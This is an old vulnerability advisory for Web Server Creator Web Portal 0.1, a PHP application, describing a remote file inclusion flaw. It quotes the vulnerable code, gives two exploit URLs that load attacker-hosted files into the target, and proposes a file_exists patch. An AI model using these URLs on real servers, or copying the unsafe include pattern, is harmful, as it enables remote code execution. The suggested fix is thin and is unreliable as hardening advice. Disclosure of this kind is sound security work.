Web Server Creator - Web Portal 0.1 (PHP)

2002-11-26T00:00:00
ID SECURITYVULNS:DOC:3800
Type securityvulns
Reporter Securityvulns
Modified 2002-11-26T00:00:00

Description

Informations : °°°°°°°°°°°°°° Website : http://webcreator.com02.com Tested version : 0.1 Problem : Include file

PHP Code/Location : °°°°°°°°°°°°°°°°°°° news/include/customize.php :


<? $langfile = $l;

include $l; ?>


index.php :

[...] if (!$pg) { $pg = "acceuil"; } [...] require ("$pg.php"); ?> [...]


Exploits : °°°°°°°°°° http://[target]/news/include/customize.php?l=http://[attacker]/file.txt with http://[attacker]/file.txt

and

http://[target]/index.php?pg=http://[attacker]/badfile with http://[attacker]/badfile.php

Solution : °°°°°°°°°° - Delete bugged lines in news/include/customize.php - In index.php replce this line : require ("$pg.php"); by :


if (file_exists($pg.".php")){ require ("$pg.php"); }


A patch can be found on http://www.phpsecure.org.

More details : °°°°°°°°°°°°°° In french : http://www.frog-man.org/tutos/WSC-WebPortal.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWSC-WebPortal.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII

frog-m@n


MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp